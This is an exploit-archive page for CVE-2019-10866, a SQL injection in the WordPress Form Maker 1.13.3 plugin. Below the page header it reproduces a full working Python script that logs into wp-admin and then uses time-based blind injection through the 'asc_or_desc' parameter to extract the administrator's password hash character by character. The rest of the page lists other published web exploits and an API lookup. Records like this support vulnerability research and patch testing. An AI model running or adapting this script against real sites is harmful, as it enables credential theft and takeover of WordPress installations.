Menu

"WordPress Plugin Form Maker 1.13.3 - SQL Injection"

Author

"Daniele Scanu"

Platform

php

Release date

2019-06-03

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
# -*- coding: utf-8 -*-
# Exploit Title: WordPress Plugin Form Maker 1.13.3 - SQL Injection
# Date: 22-03-2019
# Exploit Author: Daniele Scanu @ Certimeter Group
# Vendor Homepage: https://10web.io/plugins/
# Software Link: https://wordpress.org/plugins/form-maker/
# Version: 1.13.3
# Tested on: Ubuntu 18.04
# CVE : CVE-2019-10866

import requests
import time

url_vuln = 'http://localhost/wordpress/wp-admin/admin.php?page=submissions_fm&task=display&current_id=2&order_by=group_id&asc_or_desc='
session = requests.Session()
dictionary = '@._-$/\\"£%&;§+*1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'
flag = True
username = "username"
password = "password"
temp_password = ""
TIME = 0.5

def login(username, password):
    payload = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Login',
        'redirect_to': 'http://localhost/wordpress/wp-admin/',
        'testcookie': 1
    }
    session.post('http://localhost/wordpress/wp-login.php', data=payload)

def print_string(str):
    print "\033c"
    print str

def get_admin_pass():
    len_pwd = 1
    global flag
    global temp_password
    while flag:
        flag = False
        ch_temp = ''
        for ch in dictionary:
            print_string("[*] Password dump: " + temp_password + ch)
            ch_temp = ch
            start_time = time.time()
            r = session.get(url_vuln + ',(case+when+(select+ascii(substring(user_pass,' + str(len_pwd) + ',' + str(len_pwd) + '))+from+wp_users+where+id%3d1)%3d' + str(ord(ch)) + '+then+(select+sleep(' + str(TIME) + ')+from+wp_users+limit+1)+else+2+end)+asc%3b')
            elapsed_time = time.time() - start_time
            if elapsed_time >= TIME:
                flag = True
                break
        if flag:
            temp_password += ch_temp
            len_pwd += 1

login(username, password)
get_admin_pass()
print_string("[+] Password found: " + temp_password)
Release Date Title Type Platform Author
2019-08-16 "Integria IMS 5.0.86 - Arbitrary File Upload" webapps php Greg.Priest
2019-08-16 "Joomla! component com_jsjobs 1.2.6 - Arbitrary File Deletion" webapps php qw3rTyTy
2019-08-16 "EyesOfNetwork 5.1 - Authenticated Remote Command Execution" webapps php "Nassim Asrir"
2019-08-14 "WordPress Plugin Download Manager 2.5 - Cross-Site Request Forgery" webapps php "Princy Edward"
2019-08-14 "Joomla! Component JS Jobs (com_jsjobs) 1.2.5 - 'customfields.php' SQL Injection" webapps php qw3rTyTy
2019-08-14 "SugarCRM Enterprise 9.0.0 - Cross-Site Scripting" webapps php "Ilca Lucian Florin"
2019-08-12 "Mitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated OS Command Injection Bind Shell" webapps php xerubus
2019-08-12 "Mitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated Configuration Download" webapps php xerubus
2019-08-14 "Agent Tesla Botnet - Arbitrary Code Execution (Metasploit)" remote php "Ege Balci"
2019-08-13 "AZORult Botnet - SQL Injection" remote php prsecurity
2019-08-13 "Agent Tesla Botnet - Arbitrary Code Execution" remote php prsecurity
2019-08-12 "Joomla! Component JS Jobs (com_jsjobs) 1.2.5 - 'cities.php' SQL Injection" webapps php qw3rTyTy
2019-08-12 "osTicket 1.12 - Persistent Cross-Site Scripting" webapps php "Aishwarya Iyer"
2019-08-12 "osTicket 1.12 - Formula Injection" webapps php "Aishwarya Iyer"
2019-08-12 "osTicket 1.12 - Persistent Cross-Site Scripting via File Upload" webapps php "Aishwarya Iyer"
2019-08-12 "Joomla! Component JS Support Ticket (com_jssupportticket) 1.1.6 - 'ticket.php' Arbitrary File Deletion" webapps php qw3rTyTy
2019-08-12 "Joomla! Component JS Support Ticket (com_jssupportticket) 1.1.6 - 'ticketreply.php' SQL Injection" webapps php qw3rTyTy
2019-08-12 "UNA 10.0.0 RC1 - 'polyglot.php' Persistent Cross-Site Scripting" webapps php Greg.Priest
2019-08-12 "BSI Advance Hotel Booking System 2.0 - 'booking_details.php Persistent Cross-Site Scripting" webapps php "Angelo Ruwantha"
2019-08-08 "Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - SQL Injection" webapps php qw3rTyTy
2019-08-08 "Adive Framework 2.0.7 - Cross-Site Request Forgery" webapps php "Pablo Santiago"
2019-08-08 "Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - Arbitrary File Download" webapps php qw3rTyTy
2019-08-08 "Daily Expense Manager 1.0 - Cross-Site Request Forgery (Delete Income)" webapps php "Mr Winst0n"
2019-08-08 "Open-School 3.0 / Community Edition 2.3 - Cross-Site Scripting" webapps php Greg.Priest
2019-08-08 "Baldr Botnet Panel - Arbitrary Code Execution (Metasploit)" remote php "Ege Balci"
2019-08-07 "WordPress Plugin JoomSport 3.3 - SQL Injection" webapps php "Pablo Santiago"
2019-08-02 "1CRM On-Premise Software 8.5.7 - Persistent Cross-Site Scripting" webapps php "Kusol Watchara-Apanukorn"
2019-08-02 "Rest - Cafe and Restaurant Website CMS - 'slug' SQL Injection" webapps php n1x_
2019-08-02 "Sar2HTML 3.2.1 - Remote Command Execution" webapps php "Cemal Cihad ÇİFTÇİ"
2019-08-01 "WebIncorp ERP - SQL injection" webapps php n1x_
Release Date Title Type Platform Author
2019-06-03 "WordPress Plugin Form Maker 1.13.3 - SQL Injection" webapps php "Daniele Scanu"
2019-04-02 "CMS Made Simple < 2.2.10 - SQL Injection" webapps php "Daniele Scanu"
2019-03-15 "CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload" webapps php "Daniele Scanu"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46958/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46958/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46958/41376/wordpress-plugin-form-maker-1133-sql-injection/download/", "exploit_id": "46958", "exploit_description": "\"WordPress Plugin Form Maker 1.13.3 - SQL Injection\"", "exploit_date": "2019-06-03", "exploit_author": "\"Daniele Scanu\"", "exploit_type": "webapps", "exploit_platform": "php", "exploit_port": null}
                                            

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Browse exploit APIBrowse